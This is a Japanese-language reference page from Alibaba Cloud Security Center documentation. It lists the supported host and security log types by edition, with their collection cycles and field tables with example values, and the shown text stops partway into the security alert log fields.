すべてのプロダクト
Search
ドキュメントセンター

Security Center:ログのカテゴリとフィールド

最終更新日:Sep 09, 2026

Security Center のログ分析は、ホストのアクティビティとセキュリティイベントデータを一元管理し、監査、インシデントの追跡、脅威検知に利用します。ここでは、サポートされているログタイプ、エディション別の利用可否、ログフィールド、収集サイクルについて説明します。

バージョンのサポート

利用可能なログタイプは、ご利用の Security Center のエディションまたは保護レベルによって異なります。

サブスクリプション

ホストログ

ログタイプ

無料版

Anti-virus Edition

プロ版

エンタープライズ版

Ultimate (コンテナセキュリティ)

ログインフローログ

非サポート

サポート

サポート

サポート

サポート

ネットワーク接続ログ

非サポート

サポート

サポート

サポート

サポート

プロセス起動ログ

非サポート

サポート

サポート

サポート

サポート

ブルートフォース攻撃ログ

非サポート

サポート

サポート

サポート

サポート

DNS リクエストログ

非サポート

サポート

サポート

サポート

サポート

クライアントイベントログ

サポート

サポート

サポート

サポート

サポート

アカウントスナップショットログ

非サポート

非サポート

非サポート

サポート

サポート

ネットワークスナップショットログ

非サポート

非サポート

非サポート

サポート

サポート

プロセススナップショットログ

非サポート

非サポート

非サポート

サポート

サポート

バイナリモジュールログ

サポート

サポート

サポート

サポート

サポート

プロセス書き込みファイルログ

サポート

サポート

サポート

サポート

サポート

レジストリ操作ログ

サポート

サポート

サポート

サポート

サポート

セキュリティログ

ログタイプ

無料版

Anti-virus Edition

プロ版

エンタープライズ版

Ultimate (コンテナセキュリティ)

セキュリティアラートログ

サポート

説明

Basic エディションでサポートされているアラートのみを記録します。

サポート

サポート

サポート

サポート

脆弱性ログ

サポート

説明

Basic エディションでサポートされている脆弱性のみを記録します。

サポート

サポート

サポート

サポート

ネットワーク防御ログ

非サポート

サポート

サポート

サポート

サポート

コアファイル監視イベントログ

非サポート

非サポート

非サポート

サポート

サポート

CSPM - ベースラインチェックログ

非サポート

非サポート

サポート

サポート

サポート

CSPM - クラウドプラットフォーム設定チェックログ

サポート

サポート

サポート

サポート

アプリケーション保護ログ

サポート

サポート

サポート

サポート

悪意のあるファイル検出ログ

サポート

サポート

サポート

サポート

エージェントレス検出ログ

サポート

サポート

サポート

サポート

付加価値サービスのログ

以下のいずれかの付加価値サービスを有効にすると、Security Center はそれらが生成するログを分析します:

  • 不正ファイル検出

  • エージェントレス検出

  • アプリケーション保護

  • クラウドプラットフォーム構成チェック(ベースライン検査 および 設定のチェック)

従量課金

ホストおよびコンテナのセキュリティ の従量課金サービスをご購入の場合、利用可能なログタイプは各サーバーに割り当てられた保護レベルによって異なります。

ホストログ

ログタイプ

未保護

ウイルス対策

ホスト総合保護

ホスト・コンテナの包括的保護

ログインフローログ

非サポート

サポート

サポート

サポート

ネットワーク接続ログ

非サポート

サポート

サポート

サポート

プロセス起動ログ

非サポート

サポート

サポート

サポート

ブルートフォース攻撃ログ

非サポート

サポート

サポート

サポート

DNS リクエストログ

非サポート

サポート

サポート

サポート

クライアントイベントログ

サポート

サポート

サポート

サポート

アカウントスナップショットログ

非サポート

非サポート

サポート

サポート

ネットワークスナップショットログ

非サポート

非サポート

サポート

サポート

プロセススナップショットログ

非サポート

非サポート

サポート

サポート

セキュリティログ

ログタイプ

未保護

ウイルス対策

ホスト総合保護

ホスト・コンテナの包括的保護

セキュリティアラートログ

サポート

説明

Unprotected レベルでサポートされているアラートのみを記録します。

サポート

サポート

サポート

脆弱性ログ

サポート

説明

Unprotected レベルでサポートされている脆弱性のみを記録します。

サポート

サポート

サポート

ネットワーク防御ログ

非サポート

サポート

サポート

サポート

コアファイル監視イベントログ

非サポート

非サポート

サポート

サポート

従量課金サービスのログ

以下のいずれかの従量課金サービスを有効にすると、Security Center はそれらが生成するログを分析します:

  • 不正ファイル検出

  • エージェントレス検出

  • アプリケーション保護

  • クラウドプラットフォーム構成チェック(ベースライン検査、クラウドプラットフォームの構成チェック)

ログタイプの概要

説明

ログのサンプルとフィールドの説明は参考用です。フィールドは製品のアップデートに伴い変更される場合があります。Simple Log Service (SLS) 内の実際のデータが最新のスキーマを反映しています。

Security Center のログのフィールドリストには、project_id フィールドは含まれていません。ログは SLS プロジェクトに保存されます。SLS プロジェクトは aliyun-cloudsiem-data-{UID}-{RegionID} という形式で命名されます。ここで、{UID} はご利用の Alibaba Cloud アカウントの UID であり、{RegionID} はリージョン ID です。SLS プロジェクトはストレージの階層概念であり、ログフィールドではありません。所有者でログをフィルタリングする必要がある場合は、ログフィールドレベルではなく、SLS プロジェクトレベルでフィルタリングしてください。

ホストログ

ログインフローログ

  • __topic__:aegis-log-login

  • ログ内容:送信元 IP、ユーザー名、結果など、サーバーのログインイベントを記録します。

  • 機能説明:ユーザーアクティビティを監視し、異常な動作を検出します。

    重要

    Security Center は、Windows Server 2008 を実行しているサーバーのログインフローログを収集しません。

  • 収集サイクル:リアルタイム。

ネットワーク接続ログ

  • __topic__:aegis-log-network

  • ログ内容:5 タプルや関連プロセスなど、サーバー上のリアルタイムのネットワーク接続を記録します。

  • 機能説明:異常な接続パターンを特定し、ネットワーク攻撃を検出し、パフォーマンスを最適化します。

    説明

    エージェントは、確立から終了までの接続状態のサブセットのみを収集します。インバウンドトラフィックは記録されません。

  • 収集サイクル:リアルタイム。

プロセス起動ログ

  • __topic__:aegis-log-process

  • ログ内容:プロセス名、コマンドライン引数、親プロセスなど、すべての新しいプロセスの起動イベントを記録します。

  • 機能説明:プロセスの起動を追跡し、異常な動作を検出し、マルウェアの侵入を特定します。

  • 収集サイクル:リアルタイム。ログはプロセスの起動時に即座に報告されます。

バイナリモジュールログ

  • __topic__:aegis-log-bin-module

  • ログ内容:モジュールファイルパス、ハッシュ値、サイズ、作成時刻など、プロセスによってロードされたバイナリモジュールに関する情報を記録します。

  • 機能説明:ランタイムでのモジュールの依存関係を理解し、異常なモジュールのロードや悪意のある DLL インジェクションを検出します。

  • 収集サイクル:リアルタイム。

プロセス書き込みファイルログ

  • __topic__:aegis-log-file-event

  • ログ内容:ファイルパス、プロセス情報、コンテナ情報など、プロセスによるファイル書き込みイベントを記録します。

  • 機能説明:ファイルの書き込み動作を追跡し、異常なファイル操作、悪意のあるファイルの作成、データ漏洩のリスクを検出します。

  • 収集サイクル:リアルタイム。

レジストリ操作ログ

  • __topic__:aegis-log-regedit

  • ログ内容:レジストリキーのパス、値、データ型、および操作を実行したプロセスなど、レジストリ操作イベントを記録します。

  • 機能説明:レジストリの変更を監視し、システム設定を変更したり永続化を確立したりするマルウェアを検出します。

  • 収集サイクル:リアルタイム。

ブルートフォース攻撃ログ

  • __topic__:aegis-log-crack

  • ログ内容:システム、アプリケーション、アカウントに対するブルートフォース攻撃の試みを記録します。

  • 機能説明:ブルートフォース攻撃を特定し、異常なログイン、弱いパスワード、認証情報の漏洩を検出し、インシデント対応とフォレンジック分析をサポートします。

  • 収集サイクル:リアルタイム。

アカウントスナップショットログ

  • __topic__:aegis-snapshot-host

  • ログ内容:ユーザー名、パスワードポリシー、ログイン履歴などのユーザーアカウントの詳細を記録します。

  • 機能説明:

    重要

    スナップショットを時系列で比較して、アカウントの変更を監視し、不正アクセスやアカウントステータスの異常を検出します。

  • 収集サイクル:資産フィンガープリントの間隔 (デフォルト:1 日 1 回) に基づく自動収集。手動収集もサポートされています。

ネットワークスナップショットログ

  • __topic__:aegis-snapshot-port

  • ログ内容:5 タプル、ステータス、関連プロセスなどのネットワーク接続を記録します。

  • 機能説明:アクティブな接続、異常なパターン、潜在的なネットワーク攻撃を特定します。

  • 収集サイクル:資産フィンガープリントの間隔 (デフォルト:1 日 1 回) に基づく自動収集。手動収集もサポートされています。

プロセススナップショットログ

  • __topic__:aegis-snapshot-process

  • ログ内容:プロセス ID、名前、起動時刻などのプロセスアクティビティを記録します。

  • 機能説明:プロセスアクティビティとリソース消費を監視し、異常なプロセス、過剰な CPU 使用量、メモリリークを検出します。

  • 収集サイクル:資産フィンガープリントの間隔 (デフォルト:1 日 1 回) に基づく自動収集。手動収集もサポートされています。

DNS リクエストログ

  • __topic__:aegis-log-dns-query

  • ログ内容:ドメイン名、クエリタイプ、ソースなど、サーバーによって開始された DNS クエリを記録します。

  • 機能説明:DNS アクティビティを分析し、異常なクエリ、ドメインハイジャック、またはポイズニングを検出します。

    重要

    カーネルバージョンが 4.x.x より前の Linux サーバーではログ収集はサポートされていません。

  • 収集サイクル:リアルタイム。

クライアントイベントログ

  • __topic__:aegis-log-client

  • ログ内容:Security Center クライアントのオンライン/オフラインイベントを記録します。

  • 機能説明:クライアントの可用性を監視します。

  • 収集サイクル:リアルタイム。

セキュリティログ

重要

すべてのセキュリティログはリアルタイムで収集されます。

脆弱性ログ

  • __topic__:sas-vul-log

  • ログ内容:名前、ステータス、処理アクションなど、発見された脆弱性を記録します。

  • 機能説明:脆弱性を追跡し、セキュリティリスクを評価し、修復の優先順位を付けます。

CSPM - ベースラインチェックログ

  • __topic__:sas-hc-log

  • ログ内容:レベル、カテゴリ、リスクレベルなど、ベースラインチェックの結果を記録します。

  • 機能説明:ベースラインのセキュリティ態勢を評価し、設定リスクを特定します。

    説明

    初めて失敗したチェック項目と、以前は合格したが再検査で失敗した項目のみが記録されます。

セキュリティアラートログ

  • __topic__:sas-security-log

  • ログ内容:データソース、詳細、深刻度レベルなど、セキュリティアラートを記録します。

  • 機能説明:セキュリティ脅威を理解し、迅速に対応します。

CSPM - クラウドプラットフォーム設定チェックログ

  • __topic__:sas-cspm-log

  • ログ内容:クラウドプラットフォームの設定チェック結果とホワイトリスト登録操作を記録します。

  • 機能説明:クラウドプラットフォームの設定の問題とセキュリティリスクを特定します。

ネットワーク防御ログ

  • __topic__:sas-net-block

  • ログ内容:攻撃タイプ、送信元および宛先 IP アドレスなど、ネットワーク攻撃イベントを記録します。

  • 機能説明:ネットワーク攻撃を検出し、脅威に対応し、ネットワークセキュリティを向上させます。

アプリケーション保護ログ

  • __topic__:sas-rasp-log

  • ログ内容:攻撃タイプ、行動データ、攻撃者の IP など、RASP 攻撃アラートを記録します。

  • 機能説明:アプリケーションレイヤー攻撃を検出し、ランタイムセキュリティを向上させます。

悪意のあるファイル検出ログ

  • __topic__:sas-filedetect-log

  • ログ内容:ファイル情報、検出シナリオ、結果など、悪意のあるファイルの検出結果を記録します。

  • 機能説明:オフラインファイルやクラウドストレージ内の悪意のあるプログラムを特定し、タイムリーな処理を可能にします。

コアファイル監視イベントログ

  • __topic__:aegis-file-protect-log

  • ログ内容:ファイルパス、操作タイプ、アラートレベルなど、コアファイル監視アラートを記録します。

  • 機能説明:コアファイルの盗難や改ざんを検出します。

エージェントレス検出ログ

  • __topic__:sas-agentless-log

  • ログ内容:脆弱性、ベースラインチェック、悪意のあるサンプル、機密ファイルなど、クラウドサーバー、ディスクスナップショット、イメージのセキュリティリスクを記録します。

  • 機能説明:期間をまたいで資産のセキュリティリスクを表示し、潜在的な脅威を特定します。

ホストログフィールド

ログインフローログ

フィールド

説明

例

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

src_ip

サーバーへのログインに使用された送信元 IP アドレス。

221.11.XX.XX

dst_port

ログインに使用されたポート。

22

login_type

ログインタイプ。値には、SSHLOGIN (SSH)、RDPLOGIN (リモートデスクトップ)、IPCLOGIN (IPC 接続) などがあります。

SSH

username

ログインに使用されたユーザー名。

admin

login_count

ログイン回数。1 分以内の繰り返しログインは 1 つのエントリにマージされます。たとえば、login_count が 3 の場合、過去 1 分間に 3 回のログインがあったことを示します。

3

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

auth_type

認証タイプ、文字列型。

  • 1:パスワード認証。

  • 2:キーベースの認証。

1

success

ログインが成功したかどうかを示します。値:1 (成功)、0 (失敗)。

1

pid

認証プロセスの PID。

12345

src_port

ログインの送信元ポート番号、文字列型。

43006

ssh_fingerprint

ログインに使用された SSH キーの指紋、文字列型。キーベースの認証が使用される場合、このフィールドには対応するキーの指紋が記録されます。パスワードベースの認証が使用される場合、このフィールドは空になります。

SHA256:xxxxxxxxxxxx

ネットワーク接続ログ

フィールド

説明

例

cmd_chain

プロセスチェーン。

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

プロセスチェーンインデックス。このインデックスを使用して、対応するプロセスチェーンを検索します。

B184

container_hostname

コンテナ内のホスト名。

nginx-ingress-controller-765f67fd4d-****

container_id

コンテナ ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

コンテナイメージ ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

コンテナイメージ名。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

コンテナ名。

nginx-ingress-****

container_pid

コンテナ内のプロセス ID。

0

net_connect_dir

ネットワーク接続方向。値:in (インバウンド)、out (アウトバウンド)。

in

dst_ip

接続受信側の IP アドレス。net_connect_dir が out の場合はピアホスト、in の場合はローカルホストです。

192.168.XX.XX

dst_port

接続受信側のポート。

443

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

parent_proc_name

親プロセスのファイル名。

/usr/bin/bash

pid

プロセス ID。

14275

ppid

親プロセス ID。

14268

proc_name

プロセス名。

nginx

proc_path

プロセスパス。

/usr/local/nginx/sbin/nginx

proc_start_time

プロセスの起動時間。

N/A

connection_type

プロトコル。値:tcp、raw (RAW ソケット)。

tcp

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

src_ip

送信元 IP アドレス。

100.127.XX.XX

src_port

送信元ポート。

41897

srv_comm

親の親プロセスに関連付けられたコマンド名。

containerd-shim

status

ネットワーク接続ステータス。値:1 (クローズ)、2 (リッスン中)、3 (SYN 送信済み)、4 (SYN 受信済み)、5 (確立済み)、6 (クローズ待機)、7 (クローズ中)、8 (FIN 待機 1)、9 (FIN 待機 2)、10 (時間待機)、11 (TCB 削除済み)。

5

type

リアルタイムネットワーク接続のタイプ。値:connect (アクティブな TCP 接続開始)、accept (TCP 接続受信)、listen (ポートがリッスン中)。

listen

uid

プロセスユーザーの ID。

101

username

プロセスのユーザー名。

root

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

プロセス起動ログ

フィールド

説明

例

cmd_chain

プロセスチェーン。

[ {"9883":"bash -c kill -0 -- -'6274'"} ... ]

cmd_chain_index

プロセスチェーンインデックス。このインデックスを使用して、対応するプロセスチェーンを検索します。

B184

cmd_index

コマンドライン内の各パラメーターのインデックス。値の各ペアは、パラメーターの開始位置と終了位置を示します。

0,3,5,8

cmdline

プロセスの起動に使用された完全なコマンドライン。

ipset list KUBE-6-CLUSTER-IP

comm

プロセスに関連付けられたコマンド名。

N/A

container_hostname

コンテナ内のホスト名。

nginx-ingress-controller-765f67fd4d-****

container_id

コンテナ ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

コンテナイメージ ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

コンテナイメージ名。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

コンテナ名。

nginx-ingress-****

container_pid

コンテナ内のプロセス ID。

0

cwd

プロセスの作業ディレクトリ。

N/A

proc_name

プロセスファイル名。

ipset

proc_path

プロセスファイルの完全なパス。

/usr/sbin/ipset

gid

プロセスグループ ID。

0

groupname

ユーザーグループ名。

group1

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

parent_cmd_line

親プロセスのコマンドライン。

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

親プロセスのファイル名。

kube-proxy

parent_proc_path

親プロセスファイルの完全なパス。

/usr/local/bin/kube-proxy

pid

プロセス ID。

14275

ppid

親プロセス ID。

14268

proc_start_time

プロセス起動時刻。

2024-08-01 16:45:40

parent_proc_start_time

親プロセスの起動時刻。

2024-07-12 19:45:19

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

srv_cmd

親の親プロセスのコマンドライン。

/usr/bin/containerd

tty

ログイン端末。N/A は、アカウントが端末にログインしたことがないことを示します。

N/A

uid

ユーザー ID。

123

username

プロセスのユーザー名。

root

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

ブルートフォース攻撃ログ

フィールド

説明

例

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

ブルートフォース攻撃を受けているサーバーの IP アドレス。

192.168.XX.XX

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

uuid

ブルートフォース攻撃を受けているサーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12*****

login_count

失敗したログイン試行の回数。1 分以内の繰り返しの試行は 1 つのエントリにマージされます。たとえば、login_count が 3 の場合、過去 1 分間に 3 回の試行があったことを示します。

3

src_ip

ログイン試行の送信元 IP アドレス。

47.92.XX.XX

dst_port

ログインポート。

22

login_type

ログインタイプ。値:SSHLOGIN (SSH ログイン)、RDPLOGIN (リモートデスクトップログイン)、IPCLOGIN (IPC 接続ログイン)、SQLSERVER (SQL Server ログイン失敗)。

SSH

username

ログインユーザー名。

user

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

アカウントスナップショットログ

フィールド

説明

例

account_expire

アカウントの有効期限。値 never は、アカウントが有効期限切れにならないことを意味します。

never

domain

アカウントが属するドメインまたはディレクトリサービス。N/A は、アカウントがどのドメインにも属していないことを意味します。

N/A

groups

アカウントが属するグループ。N/A は、アカウントがどのグループにも属していないことを意味します。

["nscd"]

home_dir

ホームディレクトリ。システム内でファイルを保存および管理するためのデフォルトの場所です。

/Users/abc

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

last_chg

パスワードが最後に変更された日付。

2022-11-29

last_logon

最終ログインの日時。N/A は、アカウントがログインに使用されたことがないことを意味します。

2023-08-18 09:21:21

login_ip

最終ログインのリモート IP アドレス。N/A は、アカウントがログインに使用されたことがないことを意味します。

192.168.XX.XX

passwd_expire

パスワードの有効期限。値 never は、パスワードが有効期限切れにならないことを意味します。

2024-08-24

perm

アカウントに root 権限があるかどうか。値:0 (root 権限なし)、1 (root 権限あり)。

0

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

shell

Linux シェル。

/sbin/nologin

status

ユーザーアカウントのステータス。値:0 (ログイン禁止)、1 (ログイン許可)。

0

tty

ログイン端末。N/A は、アカウントが端末にログインしたことがないことを示します。

N/A

username

ユーザー名。

nscd

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

warn_time

パスワード有効期限切れのリマインダー日。値 never は、リマインダーが設定されていないことを意味します。

2024-08-20

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

ネットワークスナップショットログ

フィールド

説明

例

net_connect_dir

ネットワーク接続方向。値:in (インバウンド)、out (アウトバウンド)。注意:ステータスが 2 のログのみ配信されるため、net_connect_dir は常に in となります。

in

dst_ip

ピア IP アドレス。通常は空です。注意:ステータスが 2 のログのみ配信されるため、dst_ip (ピア IP) は常に空となり、src_ip がローカル IP となります。

dst_port

接続受信側のポート。

443

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

pid

プロセス ID。

682

proc_name

プロセス名。

sshd

connection_type

プロトコル。値:tcp4 (TCP over IPv4)、tcp6 (TCP over IPv6)。

tcp4

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

src_ip

ローカル IP アドレス。

100.127.XX.XX

src_port

リッスンポート。

41897

status

値は 2 で、ポートがリッスン中であることを示します。関連する src_ip/src_port はリッスンアドレスです。他のステータスは配信されません。配信されないその他の値:1 (クローズ)、3 (SYN 送信済み)、4 (SYN 受信済み)、5 (確立済み)、6 (クローズ待機)、7 (クローズ中)、8 (FIN 待機 1)、9 (FIN 待機 2)、10 (時間待機)、11 (TCB 削除済み)。

5

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

プロセススナップショットログ

フィールド

説明

例

cmdline

プロセスの起動に使用された完全なコマンドライン。

/usr/local/share/assist-daemon/assist_daemon

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

md5

バイナリファイルの MD5 ハッシュ。1 MB を超えるファイルは計算されません。

1086e731640751c9802c19a7f53a64f5

proc_name

プロセスファイル名。

assist_daemon

proc_path

プロセスファイルの完全なパス。

/usr/local/share/assist-daemon/assist_daemon

pid

プロセス ID。

1692

pname

親プロセスのファイル名。

systemd

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

proc_start_time

プロセス起動時刻。組み込みフィールド。

2023-08-18 20:00:12

uid

プロセスユーザー ID。

101

username

プロセスのユーザー名。

root

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

DNS リクエストログ

フィールド

説明

例

domain

DNS リクエストに対応するドメイン名。

example.aliyundoc.com

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

DNS リクエストを開始したサーバーの IP アドレス。

192.168.XX.XX

pid

DNS リクエストを開始したプロセス ID。

3544

ppid

DNS リクエストを開始した親プロセス ID。

3408

cmd_chain

DNS リクエストを開始したプロセスチェーン。

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

DNS リクエストを開始したコマンドライン。

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

DNS リクエストを開始したプロセスのパス。

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

Security Center におけるサーバーのアセットグループ。

default

time

DNS リクエストイベントがキャプチャされた時刻。この時刻は通常、DNS リクエストの実際の発生時刻と一致します。

2023-08-17 20:05:04

uuid

DNS リクエストを開始したサーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

クライアントイベントログ

フィールド

説明

例

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

agent_version

クライアントバージョン。

aegis_11_91

last_login

前回のログインのタイムスタンプ (ミリ秒単位)。

1716444387617

platform

オペレーティングシステムタイプ。値:windows、linux。

linux

region_id

サーバーが存在するリージョン ID。

cn-beijing

status

クライアントステータス。値:online、offline。

online

start_time

開始タイムスタンプ (秒単位)。イベントの発生時刻を示すためにも使用されます。

1719472214

バイナリモジュールログ

フィールド

説明

例

user_id

ユーザー ID。

123

host_ip

クライアントマシンの IP アドレス。

1.2.3.4

uuid

サーバーの UUID。

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

proc_list

モジュールをロードしたプロセスのリスト (JSON 形式)。

[{"path":"C:/Windows/System32/svchost.exe","cmdline":"...","pid":84,"md5":"..."}]

file_path

モジュールファイルパス。

c:\\windows\\system32\\msvcrt.dll

md5

モジュールの MD5 ハッシュ。

d80c5d199b7700b89dbdc52ab58c7519

sha256

モジュールの SHA256 ハッシュ。空の文字列は計算されていないことを示します。

file_size

モジュールサイズ (バイト単位)。

800008

bin_create

モジュール作成時刻。

2017-06-08 11:49:55

bin_modified

モジュールの最終変更時刻。

2014-10-29 11:06:28

source

ソースタイプ識別子。

5

start_time

ログ書き込みタイムスタンプ (秒単位、UNIX タイムスタンプ)。

1719472214

プロセスファイル書き込みログ

フィールド

説明

例

user_id

ユーザー ID。

123

host_ip

クライアントマシンの IP アドレス。

1.2.3.4

uuid

サーバーの UUID。

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

proc_path

ファイルを操作したプロセスのパス。

/home/shared/app_bin/maple_ffmpeg

cmdline

プロセスの完全なコマンドライン。

/home/shared/app_bin/maple_ffmpeg -y -threads 4 -i ...

event_type

`open` や `write` などのファイル操作イベントタイプ。

open

file_path

操作されたファイルのパス。

/home/shared/app-video-trans/dbe36b1f-.../...

parent_proc_path

親プロセスの実行可能ファイルパス。

/usr/java/jdk1.8.0_171/bin/java

pid

プロセス ID。

882378

ppid

親プロセス ID。

1019718

pstime

親プロセスの起動時刻。

2025-10-30 12:02:38

proc_start_time

プロセスの起動時間。

2025-10-30 12:02:38

cmd_chain

プロセス呼び出しチェーン (JSON 形式)。

[{"882378":"/home/shared/app_bin/maple_ffmpeg..."}]

cmd_chain_index

コマンドチェーンインデックス識別子。

P47948934

srv_cmd

関連するサービスコマンドライン。

/usr/bin/python /usr/bin/supervisord -c /etc/supervisord.conf

srv_comm

関連するサービス名。

supervisord

flag

ファイル操作フラグ値。

33345

old_file_path

名前の変更または移動前の元のファイルパス。

username

操作を実行したユーザー名。

container_id

コンテナ ID。

container_name

コンテナ名。

container_hostname

コンテナ内のホスト名。

container_image_id

コンテナイメージ ID。

container_image_name

コンテナイメージ名。

start_time

ログ書き込みタイムスタンプ (秒単位、UNIX タイムスタンプ)。

1719472214

レジストリ操作ログ

フィールド

説明

例

user_id

ユーザー ID。

123

host_ip

クライアントマシンの IP アドレス。

1.2.3.4

uuid

サーバーの UUID。

inet-eb7c23e9-1352-4f03-a1b3-73800d3524da

registry_key

操作されたレジストリキーパス。

\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\...

registry_value

レジストリキーの値。

N/A

registry_type

レジストリキーのデータ型。

N/A

key_account

レジストリ操作を実行したアカウント。

N/A

proc_path

レジストリ操作を実行したプロセスのパス。

C:/Program Files (x86)/ManageEngine/UEMS_Agent/bin/DCProcessMonitor.exe

cmdline

プロセスのコマンドライン。

DCProcessMonitor.exe

pid

プロセス ID。

11060

ppid

プロセスの親プロセス ID。

2272

time

レジストリ操作が発生した時刻。

2025-11-12 10:32:42

start_time

ログ書き込みタイムスタンプ (秒単位、UNIX タイムスタンプ)。

1719472214

セキュリティログフィールド

脆弱性ログ

フィールド

説明

例

vul_alias_name

脆弱性のエイリアス。

CESA-2023:1335: openssl Security Update

risk_level

リスクレベル。値: asap (高)、later (中)、nntf (低)。

later

extend_content

JSON 形式の拡張脆弱性情報。

{"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...}

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

アセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

アセットのプライベート IP アドレス。

192.168.XX.XX

instance_name

ホスト名。

hhht-linux-***

vul_name

脆弱性名。

centos:7:cesa-2023:1335

operation

脆弱性に対して実行された操作。値: new (新規)、verify (検証)、fix (修正)。

new

status

脆弱性ステータス。値:1 (未修正)、2 (修正失敗)、3 (ロールバック失敗)、4 (修正中)、5 (ロールバック中)、6 (検証中)、7 (修正済み)、8 (修正済み、再起動が必要)、9 (ロールバック済み)、10 (無視)、11 (ロールバック済み、再起動が必要)、12 (存在しない)、13 (無効)。

1

tag

脆弱性タグ。値: oval (Linux ソフトウェアの脆弱性)、system (Windows システムの脆弱性)、app (アプリケーションの脆弱性)。他の脆弱性タイプのタグはランダムな文字列になります。

oval

type

脆弱性タイプ。値: sys (Windows システムの脆弱性)、cve (Linux ソフトウェアの脆弱性)、emg (緊急の脆弱性)。

sys

uuid

サーバーの UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

CSPM - ベースラインチェックログ

フィールド

説明

例

check_item_name

確認項目の名前。

Set minimum interval for password changes

check_item_level

ベースラインチェックの重大度レベル。値: high (高)、medium (中)、low (低)。

medium

check_type

確認項目のタイプ。

Identity authentication

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

risk_level

リスクレベル。値: high (高)、medium (中)、low (低)。

medium

operation

操作。値: new (新規)、verity (検証)。

new

risk_name

リスク項目の名前。

Password policy compliance check

sas_group_name

リスク項目が検出された Security Center 内のサーバーのアセットグループ。

default

status

ステータス情報。2 つのステータスコードセットが適用されます:ベースラインチェックステータス:1 (不合格)、2 (検証中)、6 (無視)、7 (修正中)。処理ステータス:1 (未修正)、2 (修正失敗)、3 (ロールバック失敗)、4 (修正中)、5 (ロールバック中)、6 (検証中)、7 (修正済み)、8 (修正済み、再起動が必要)、9 (ロールバック済み)、10 (無視)、11 (ロールバック済み、再起動が必要)、12 (存在しない)、13 (無効)。

1

sub_type_alias_name

サブタイプのエイリアス。

International security best practices - Ubuntu 16/18/20/22 security baseline check

sub_type_name

ベースラインサブタイプ名。有効な値については、「ベースラインタイプとサブタイプのリスト」をご参照ください。

hc_ubuntu16_cis_rules

type_alias_name

タイプのエイリアス。

International security best practices

type_name

ベースラインタイプ。有効な値については、「ベースラインタイプとサブタイプのリスト」をご参照ください。

cis

uuid

リスク項目が検出されたサーバーの UUID。

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。イベントが発生した時刻も示します。

1719472214

セキュリティアラートログ

フィールド

説明

例

data_source

